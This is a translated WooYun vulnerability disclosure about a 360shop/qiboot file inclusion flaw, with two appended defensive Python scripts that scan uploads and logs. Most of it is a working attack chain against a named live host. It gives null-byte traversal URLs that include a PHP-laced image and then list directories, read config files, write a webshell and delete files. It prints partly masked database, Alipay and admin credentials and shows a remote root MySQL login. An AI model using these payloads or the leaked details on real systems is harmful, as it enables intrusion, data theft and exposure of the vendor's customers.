
Vulnerability summary

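Bug ID: wooyun-2014-048045

Title: A bloodbath caused by a file inclusion vulnerability in 360shop that can lead to server compromise

Vendor: 杭州启博科技 (Hangzhou Qibo Technology)

Author: 秋风

Submitted: 2014-01-06 17:04

Fixed: 2014-01-11 17:05

Published: 2014-01-11 17:05

Vulnerability type: File inclusion

Severity: High

Self-assessed Rank: 20

Status: The vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]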


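Vulnerability details

Disclosure status:

2014-01-06: Details have been sent to the vendor, waiting for the vendor to handle them
2014-01-11: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

0# For a file inclusion vulnerability (null-byte injection type), the usual approach is to include various log files. This time I could not find a single useful log file... so I left it alone for a few days and did not test any further!
1# One night I dreamed that I used PHP include on a user avatar, wahaha. When I woke up I went straight to looking for a place with image upload. After registering a user on the front end, I found that, damn, there was not a single place to upload an image! Take a look at the admin back end? I refuse to believe the back end offers no image upload...

Detailed description:

#0 Information gathering
www.qiboot.com
www.360shop.com.cn
These two domains belong to the same IP, so for now I guess the server-side scripts are on the same machine too!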

qiufeng@ubuntu:/tmp$ ping www.qiboot.com
PING www.qiboot.com (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=8.17 ms
...
qiufeng@ubuntu:/tmp$ ping www.360shop.com.cn
PING www.360shop.com.cn (202.75.216.198) 56(84) bytes of data.
64 bytes from 202.75.216.198: icmp_req=1 ttl=50 time=12.9 ms
...


Absolute path disclosure

Warning: preg_match() [function.preg-match]: Unknown modifier '.' in /bootqi/apache2/htdocs/vhost/company/qiboot/header.php on line 98



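Leaked username and password (the main purpose of getting into the admin back end is to upload an image carrying specific code, laying the groundwork for the later attack)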

http://www.qiboot.com/admin/login.php
username: demohu@gmail.com
password: 43******31


Weak passwords... are a disease that needs treating!


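Relative path of the controllable image (1388986954 is dynamic and can be obtained after uploading the image)
http://www.qiboot.com/upload/linkimg/1388986954.jpg
This gives the relative path "upload/linkimg/1388986954.jpg"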


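#0 Guessing from the leaked absolute path information, the absolute path of the image is as follows:
/bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg
Visit this address; if garbled data is returned, it is working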

http://www.qiboot.com/?mod=product&do=../../../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00



#1 Print directories and files; the value of parameter d can be changed to scan the whole site

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company
>> Printed listing of the directory /bootqi/apache2/htdocs/vhost/company
Array
(
[0] => .
[1] => ..
[2] => crm
[3] => fushi
[4] => help
[5] => help_hicloud
[6] => help_hicloud.zip
[7] => help_tltw
[8] => help_tltw.zip
[9] => hotel
[10] => lyf
[11] => newcom
[12] => newcom20130326.zip
[13] => newshop
[14] => qiboot
[15] => zuanshi
)
The one below looks like the services deployed for customers
http://www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@scandir($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/vhostsite
>> Printed listing of the directory /bootqi/apache2/htdocs/vhost/vhostsite
Array
(
[0] => .
[1] => ..
[2] => 171688.cn
[3] => badbuildfs
[4] => bugfree
[5] => company
[6] => domain
[7] => faq
[8] => grep.txt
[9] => helpcenter
[10] => hotel_
[11] => kehu
[12] => lyf
[13] => netdesk
[14] => newcom
[15] => newcom__2012-02
[16] => pagenotfind
[17] => qcom
[18] => qiboot
[19] => taodiantong
[20] => wddl.cn
[21] => zjtggroup
[22] => zjtggroup_20120619
[23] => zjtggroup_temp
)


#2 View files; the value of parameter d can be changed to view files across the whole site

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=print_r(@file_get_contents($_GET[d]));&d=/bootqi/apache2/htdocs/vhost/company/newshop/conf/config.php
The file contents obtained are as follows:
<?php
if ( !defined('IN_EB') )
{
die("Hacking attempt");
}
if (PHP_OS == 'WINNT')
{
/**
* Database host
*/
$dbhost = 'localhost';
$dbport = '3306';
$dbuser = "root";
$dbpass = "";
$dbname = "360_newshop";
$table_prefix = "eb_";
$dbtype = "mysql4";
$acm_type = 'file';


/**
* Remote configuration
*/
$az_prefix = 'eb';
$az_dbhost = 'localhost';
$az_dbuser = 'root';
$az_dbpass = '';
$az_dbname = 'abc_appaz';
#$az_install = 'http://appaz.test.com/install.php';
#$az_domain = 'http://appaz.test.com';
$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
$az_domain = 'http://qudao.v2.taodiantong.cn/install.php';
}
else
{

/**
* Database host
*/
$dbhost = 'localhost';
$dbport = '3306';
$dbuser = "root";
$dbpass = "qi************hop";
$dbname = "360_ncom";
$table_prefix = "eb_";
$dbtype = "mysql4";
$acm_type = 'file';


/**
* Remote configuration
*/
$az_prefix = 'eb';
$az_dbhost = '122.224.72.216';
$az_dbuser = 'az*****ll';
$az_dbpass = 'az2**********c871K';
$az_dbname = 'abc_appaz';
#$az_install = 'http://qudao.taodiantong.cn/install.php';
$az_install = 'http://qudao.v2.taodiantong.cn/install.php';
$az_domain = 'http://fuwu.taodiantong.cn';


}
$pay_config = array(
'alipay_key' => 'zrbh**********16alsto5',
'alipay_partner'=> '2088*******250',
'alipay_account'=> 'alipay@360eb.com'
);
?>


[Screenshot: 2.png]


#3 Write the legendary webshell; parameter d is the content and n is the file name

Exploitation:
www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=file_put_contents(@$_GET[n],@$_GET[d]);&d=by:wooyun.org&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.php
Corresponding file address:
http://www.360shop.com.cn/wooyun.org.txt


[Screenshot: webshell.png]


#4 Delete a file; parameter n is the file name

www.qiboot.com/?mod=product&do=../../../../../../../../bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg%00&wooyun=unlink(@$_GET[n]);&n=/bootqi/apache2/htdocs/vhost/company/newshop/wooyun.org.txt


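Test whether the mysql user root leaked in #2 can log in; not locally, remotely! It turns out remote login is not even disabled... I firmly refuse to dump the database!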

qiufeng@ubuntu:/tmp$ nmap 202.75.216.198 -p 3306
Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-06 15:02 CST
Nmap scan report for 202.75.216.198
Host is up (0.0081s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
qiufeng@ubuntu:/tmp$ mysql -h 202.75.216.198 -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1218931
Server version: 5.0.95 Source distribution
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+------------------------------+
| Database |
+------------------------------+
| information_schema |
| 360_89lou |
| 360_89lou_0818 |
| 360_canglong |
| 360_canglong_0927 |
| 360_canglong_1104 |
| 360_canglong_1112 |
| 360_crm |
| 360_help |
| 360_help_hicloud |
| 360_help_tltw |
| 360_hotel |
| 360_ncom |
| 360_newshop |
| 360_qiboot |
| 360_tcrm |
| 360_www_bandao_com |
| 3800_www_tomatoc_com |
| 51_ml |
| 8800_www_mylianmei_com |
| 8800_www_onespacetwofoot_com |
| 8800_www_yibuerzu_com |
| a_men_discuz |
| a_myzs |
| a_myzs_20120401 |
| a_sanude |
| a_skpifa_wordpress |
| a_tltest |
| abc_appaz |
| abc_appaz_0613 |
| abc_appaz_20111031 |
| abc_appaz_fx |
| abc_lsa |
| abc_taodiantong |
| ali_glsp8_com |
| ali_goucoo_com |
| ali_shuinianhua_com |
| aliefday_360shop_cc |
| alihanxianzi_360shop_cc |
| alilgg360_360shop_cc |
| app_01008034 |
| app_02263 |
| app_02632 |
| app_02633 |
| app_02634 |
| app_02635 |
| app_0618 |
| app_1301 |
| app_1307525362 |
| app_2370 |
| app_2371 |
| app_2447 |
| app_2449 |
| app_3803 |
| app_4370 |
| app_5163 |
| app_6395 |
| app_7287 |
| app_8298 |
| app_9954 |
| app_9954_20120829 |
| badbuildfs |
| bugfree2 |
| bz_meimeivip_com |
| bzelf520_360shop_cc |
| bzmagic_szjieli_com |
| bzmimidf_360shop_cc |
| daohang_171688_cn |
| daohang_wddl_cn |
| mysql |
| netdesk |
| son1308030959 |
| son1318995965 |
| son2633 |
| son2634 |
| son2638 |
| v2_lovelens_com |
| v2_mingdi_net |
| v2powerfeel_360shop_cc |
| v2soso2099_360shop_cc |
| v2xinyi521_360shop_cc |
| www_myvip8_com |
| www_yibuerzu_com |
| zjtggroup |
| zjtggroup_0619 |
+------------------------------+
85 rows in set (0.01 sec)


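Absolute path of the swapped-in image file: /bootqi/apache2/htdocs/vhost/company/qiboot/upload/linkimg/1388986954.jpg
The vendor should delete || replace it themselves
Statement: I have deleted the files written during testing; I recommend scanning the whole site.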
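
As a starting point for the site-wide scan recommended above, the following added example (not part of the original report and not the vendor's code) walks an upload directory and reports image files that lack a valid image header or contain a PHP opening tag. The sample files, the function names and the directory layout under the temporary folder are constructed for illustration; bare short tags are not matched, to avoid false positives on binary data.

```python
import re
import tempfile
from pathlib import Path

IMAGE_SUFFIXES = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}
# PHP opening tags that an include() of the file would execute.
PHP_TAG_RE = re.compile(rb"<\?(?:php|=)|<script\s+language\s*=\s*[\"']?php", re.IGNORECASE)


def inspect_image(path):
    """Return a list of findings for one file that claims to be an image."""
    data = Path(path).read_bytes()
    findings = []
    if not any(data.startswith(magic) for magic in MAGIC):
        findings.append("bad-magic")
    if PHP_TAG_RE.search(data):
        findings.append("php-tag")
    return findings


def audit_upload_dir(root):
    """Map each suspicious image under root (relative path) to its findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in IMAGE_SUFFIXES:
            findings = inspect_image(path)
            if findings:
                report[path.relative_to(root).as_posix()] = findings
    return report


def build_sample_tree(root):
    """Create constructed sample files: one clean image, two that carry PHP."""
    linkimg = Path(root) / "upload" / "linkimg"
    linkimg.mkdir(parents=True)
    jpeg_header = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
    (linkimg / "clean.jpg").write_bytes(jpeg_header + b"\x00" * 64 + b"\xff\xd9")
    # Valid JPEG header, PHP tag placed in the body (harmless placeholder code).
    (linkimg / "1388986954.jpg").write_bytes(jpeg_header + b"<?php /* placeholder */ ?>\xff\xd9")
    # No image header at all, only a short-echo tag.
    (linkimg / "banner.gif").write_bytes(b"<?= 'placeholder' ?>")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_upload_dir(tmp)
```

A file that passes the header check but still reports php-tag is the case described in this report: it displays as an image yet runs as code once an include reaches it.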

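Proof of vulnerability:

[Screenshot: webshell.png]

Remediation:

1. Filtering
2. MySQL should be exposed to the internal network only
3. Audit the entire site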
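
To support the audit, this added example (not code from the original report or the vendor) scans web server access-log lines for the request shape used above: a mod or do value that, after repeated percent-decoding, contains a null byte, a traversal sequence or absolute path, or an image extension. The log lines, IP addresses and paths are constructed samples, and the function names are illustrative.

```python
import re
from urllib.parse import unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
IMAGE_EXT_RE = re.compile(r"\.(?:jpe?g|png|gif)$", re.IGNORECASE)
WATCHED_PARAMS = {"mod", "do"}  # routing parameters seen in the report's URLs

SAMPLE_LOG = [  # constructed lines: documentation IPs, made-up paths
    '192.0.2.10 - - [06/Jan/2014:15:00:01 +0800] "GET /?mod=product&do=list HTTP/1.1" 200 5120',
    '192.0.2.44 - - [06/Jan/2014:15:00:09 +0800] "GET /?mod=product&do=../../../srv/www/upload/linkimg/1.jpg%00 HTTP/1.1" 200 812',
    '192.0.2.44 - - [06/Jan/2014:15:00:12 +0800] "GET /?mod=product&do=..%252f..%252fupload%252f1.jpg%2500 HTTP/1.1" 200 812',
    '192.0.2.10 - - [06/Jan/2014:15:00:20 +0800] "GET /upload/linkimg/1.jpg HTTP/1.1" 200 20480',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded %2500 or %252f is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(raw):
    """Return the reasons a routing-parameter value looks like file inclusion."""
    decoded = fully_decode(raw)
    reasons = ["null-byte"] if "\x00" in decoded else []
    path = decoded.split("\x00", 1)[0].replace("\\", "/")
    if "../" in path or path.startswith("/"):
        reasons.append("traversal")
    if IMAGE_EXT_RE.search(path):
        reasons.append("image-as-code")
    return reasons


def scan_log(lines):
    """Return (line_number, parameter, reasons) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        # Split on raw '&' and decode ourselves so an encoded NUL is preserved.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = classify_value(raw) if name in WATCHED_PARAMS else []
            if reasons:
                hits.append((number, name, reasons))
    return hits
```

The same three checks apply on the server side: a routing parameter should be matched against a fixed list of module names before it ever reaches include.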

Copyright notice: when reposting, please credit the source 秋风@乌云 (WooYun)


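Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2014-01-11 17:05

Vendor reply:

Vulnerability Rank: 20 (WooYun rating)

Latest status:

2014-01-13: Thank you, we will treat it right away!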